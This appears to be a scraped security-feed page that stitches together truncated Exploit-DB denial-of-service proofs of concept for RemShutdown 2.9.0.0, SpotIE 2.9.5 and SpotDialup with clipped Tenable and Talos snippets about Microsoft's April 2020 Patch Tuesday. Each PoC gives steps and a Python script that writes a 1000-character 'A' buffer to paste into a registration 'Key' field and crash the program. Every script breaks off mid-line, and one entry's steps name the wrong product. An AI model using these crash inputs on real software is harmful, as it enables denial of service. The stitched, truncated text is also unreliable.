2.Run the python operating script that will create a file (poc.txt)
3.Run the software "Register -> Enter Registration Code
4.Copy and paste the characters in the file (poc.txt)
5.Paste the characters in the field 'Key' and click on 'Ok'
6.SpotDialup Crashed
'''
#!/usr/bin/python
buffer = "A" * 1000
payload = buffer
try:
f=open("poc.txt","w")
print("[+] Creating %s bytes evil payload." %l
Exploit-DB
RemShutdown 2.9.0.0 - 'Key' Denial of Service (PoC)
exploitdb·2020-01-06
RemShutdown 2.9.0.0 - 'Key' Denial of Service (PoC)
RemShutdown 2.9.0.0 - 'Key' Denial of Service (PoC)
---
# Exploit Title: RemShutdown 2.9.0.0 - 'Key' Denial of Service (PoC)
# Exploit Author : Ismail Tasdelen
# Exploit Date: 2020-01-06
# Vendor Homepage : http://www.nsauditor.com/
# Link Software : http://www.nsauditor.com/downloads/remshutdown_setup.exe
# Tested on OS: Windows 10
# CVE : N/A
'''
Proof of Concept (PoC):
1.Download and install RemShutdown
2.Run the python operating script that will create a file (poc.txt)
3.Run the software "Register -> Enter Registration Code
4.Copy and paste the characters in the file (poc.txt)
5.Paste the characters in the field 'Key' and click on 'Ok'
6.RemShutdown Crashed
'''
#!/usr/bin/python
buffer = "A" * 1000
payload = buffer
try:
f=open("poc.txt","w")
print("[+] Creating %s bytes evil pay
Exploit-DB
SpotIE 2.9.5 - 'Key' Denial of Service (PoC)
exploitdb·2020-01-06
SpotIE 2.9.5 - 'Key' Denial of Service (PoC)
SpotIE 2.9.5 - 'Key' Denial of Service (PoC)
---
# Exploit Title: SpotIE 2.9.5 - 'Key' Denial of Service (PoC)
# Exploit Author : Ismail Tasdelen
# Exploit Date: 2020-01-06
# Vendor Homepage : http://www.nsauditor.com/
# Link Software : http://www.nsauditor.com/downloads/spotie_setup.exe
# Tested on OS: Windows 10
# CVE : N/A
'''
Proof of Concept (PoC):
1.Download and install BlueAuditor
2.Run the python operating script that will create a file (poc.txt)
3.Run the software "Register -> Enter Registration Code
4.Copy and paste the characters in the file (poc.txt)
5.Paste the characters in the field 'Key' and click on 'Ok'
6.BlueAuditor Crashed
'''
#!/usr/bin/python
buffer = "A" * 1000
payload = buffer
try:
f=open("poc.txt","w")
print("[+] Creating %s bytes evil payload." %len(payload
Tenable
Microsoft’s April 2020 Patch Tuesday Addresses 113 CVEs Including Adobe Type Manager Library Zero-Day Flaws (CVE-2020-0938, CVE-2020-1020)
blogs_tenable·2020-04-14·CVSS 7.8
[HIGH] Microsoft’s April 2020 Patch Tuesday Addresses 113 CVEs Including Adobe Type Manager Library Zero-Day Flaws (CVE-2020-0938, CVE-2020-1020)
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Talos
Microsoft Patch Tuesday — April 2020: Vulnerability disclosures and Snort coverage
blogs_talos·2020-04-14·CVSS 8.8
[HIGH] Microsoft Patch Tuesday — April 2020: Vulnerability disclosures and Snort coverage
By Jon Munshaw.
Microsoft released its monthly security update today, disclosing vulnerabilities across many of its products and releasing corresponding updates. This month's Patch Tuesday covers 115 vulnerabilities. Nineteen of the flaws Microsoft disclosed are considered critical. The remainders are scored as being “important” updates.
This month’s security update covers security issues in a variety of Microsoft services and software, including SharePoint, the Windows font library and the Windows kernel. A Cisco Talos researcher discovered CVE-2020-0939, an information disclosure vulnerability in Microsoft Media Foundation. For more, check out Talos’ full Vulnerability Spotlight here.
Talos also released a new set of SNORTⓇ rules that provide coverage for some of these vulnerabilities
Talos
Microsoft Patch Tuesday — April 2020: Vulnerability disclosures and Snort coverage
blogs_talos·2020-04-14·CVSS 8.8
[HIGH] Microsoft Patch Tuesday — April 2020: Vulnerability disclosures and Snort coverage
## Microsoft Patch Tuesday — April 2020: Vulnerability disclosures and Snort coverage
By Jon Munshaw.
Microsoft released its monthly security update today, disclosing vulnerabilities across many of its products and releasing corresponding updates. This month's Patch Tuesday covers 115 vulnerabilities. Nineteen of the flaws Microsoft disclosed are considered critical. The remainders are scored as being “important” updates.
This month’s security update covers security issues in a variety of Microsoft services and software, including SharePoint, the Windows font library and the Windows kernel. A Cisco Talos researcher discovered CVE-2020-0939 , an information disclosure vulnerability in Microsoft Media Foundation. For more, check out Talos’ full Vulnerability Spotlight here .
Talos also r
2020-04-15
Published